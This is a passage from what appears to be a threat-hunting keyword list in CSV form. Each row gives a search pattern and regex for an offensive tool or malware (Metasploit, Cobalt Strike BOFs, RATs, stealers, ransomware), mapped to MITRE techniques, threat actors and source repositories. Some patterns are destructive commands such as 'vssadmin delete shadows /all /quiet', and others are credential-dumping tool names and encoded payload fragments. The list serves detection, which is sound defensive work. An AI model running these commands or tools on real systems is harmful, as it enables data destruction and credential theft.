"*VMware-vRealize-Log-Insight.cert*",".{0,1000}VMware\-vRealize\-Log\-Insight\.cert.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62243"
"*vmx2john.py*",".{0,1000}vmx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62244"
"*VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw*",".{0,1000}VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62245"
"*vnc_password_osx.md*",".{0,1000}vnc_password_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62246"
"*vnc_passwords.txt*",".{0,1000}vnc_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62247"
"*vncdumpdll*",".{0,1000}vncdumpdll.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62248"
"*vncinject.rb*",".{0,1000}vncinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62249"
"*VNC-NoAuth -ComputerName * -Port *",".{0,1000}VNC\-NoAuth\s\-ComputerName\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","62250"
"*vncpcap2john.*",".{0,1000}vncpcap2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62252"
"*vncpwdump.*",".{0,1000}vncpwdump\..{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62253"
"*VNCViewer.exe /password AutoRDPwn *",".{0,1000}VNCViewer\.exe\s\/password\sAutoRDPwn\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","62258"
"*vnperistence.py*",".{0,1000}vnperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62261"
"*VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1*",".{0,1000}VoidFunc\sis\san\sexported\sfunction\sused\swith\sPowerSploit\'s\sInvoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","62262"
"*VolumeShadowCopyTools.ps1*",".{0,1000}VolumeShadowCopyTools\.ps1.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62265"
"*VolumeShadowCopyTools.ps1*",".{0,1000}VolumeShadowCopyTools\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","62266"
"*Volumiser.exe --image*",".{0,1000}Volumiser\.exe\s\-\-image.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","62267"
"*Volumiser\DiscUtils.Ebs\EbsMappedStream*",".{0,1000}Volumiser\\DiscUtils\.Ebs\\EbsMappedStream.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","62268"
"*voukatas/Commander*",".{0,1000}voukatas\/Commander.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","62269"
"*VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE*",".{0,1000}VPe\/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","62270"
"*vpfxasdwnuewedfn.azurewebsites.net*",".{0,1000}vpfxasdwnuewedfn\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","62271"
"*vq@QyHZx.xsz*",".{0,1000}vq\@QyHZx\.xsz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62272"
"*v-Q8Q~fEXAMPLEEXAMPLEDsmKpQw_Wwd57-albMZ*",".{0,1000}v\-Q8Q\~fEXAMPLEEXAMPLEDsmKpQw_Wwd57\-albMZ.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","62273"
"*VqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAByxaEKNqTPWTakz1k2pM9ZP9xLWRGkz1k/3FpZJqTPWT/cXFkhpM9ZNqTOWeikz1k/3ExZs6TPWT/cW1k3pM9ZP9xeWTekz1lSaWNoNqTPWQAAAAAAAAAAUEUAAEwBBAA8EQBSAAAAAAAAAADgAAMBCwEJAAAcAg*",".{0,1000}VqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAByxaEKNqTPWTakz1k2pM9ZP9xLWRGkz1k\/3FpZJqTPWT\/cXFkhpM9ZNqTOWeikz1k\/3ExZs6TPWT\/cW1k3pM9ZP9xeWTekz1lSaWNoNqTPWQAAAAAAAAAAUEUAAEwBBAA8EQBSAAAAAAAAAADgAAMBCwEJAAAcAg.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#base64","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","62274"
"*vRealizeLogInsightRCE*",".{0,1000}vRealizeLogInsightRCE.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62275"
"*Vsaver-Rat v.0.1.exe*",".{0,1000}Vsaver\-Rat\sv\.0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62280"
"*vssadmin delete shadows /all /quiet >nul*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","62283"
"*vssadmin delete shadows /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","62284"
"*vssadmin delete shadows /for=%systemdrive% /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/for\=\%systemdrive\%\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62286"
"*vssadmin delete shadows /shadow=*",".{0,1000}vssadmin\sdelete\sshadows\s\/shadow\=.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","62287"
"*vssenum.x64.*",".{0,1000}vssenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62293"
"*vssenum.x86.*",".{0,1000}vssenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62294"
"*vtiger_crm_upload_exploit*",".{0,1000}vtiger_crm_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62296"
"*vulfocus/spring-core-rce-*",".{0,1000}vulfocus\/spring\-core\-rce\-.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","62297"
"*vulmon*Vulmap*",".{0,1000}vulmon.{0,1000}Vulmap.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/vulmon/Vulmap","1","1","#linux #windows","N/A","10","10","965","194","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z","62298"
"*Vulnerabilities/RPCDump*",".{0,1000}Vulnerabilities\/RPCDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62299"
"*Vulnerable Web Enrollment endpoint identified: http://*/certsrv/certsnsh.asp*",".{0,1000}Vulnerable\sWeb\sEnrollment\sendpoint\sidentified\:\shttp\:\/\/.{0,1000}\/certsrv\/certsnsh\.asp.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","62300"
"*vulnfactory.org/exploits/*.c*",".{0,1000}vulnfactory\.org\/exploits\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","62301"
"*vulns/apache.txt*",".{0,1000}vulns\/apache\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62302"
"*vulns/iis.txt*",".{0,1000}vulns\/iis\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62303"
"*vulns/jrun.txt*",".{0,1000}vulns\/jrun\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62304"
"*vulns/tomcat.txt*",".{0,1000}vulns\/tomcat\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62305"
"*vulnweb.com/FUZZ*",".{0,1000}vulnweb\.com\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62306"
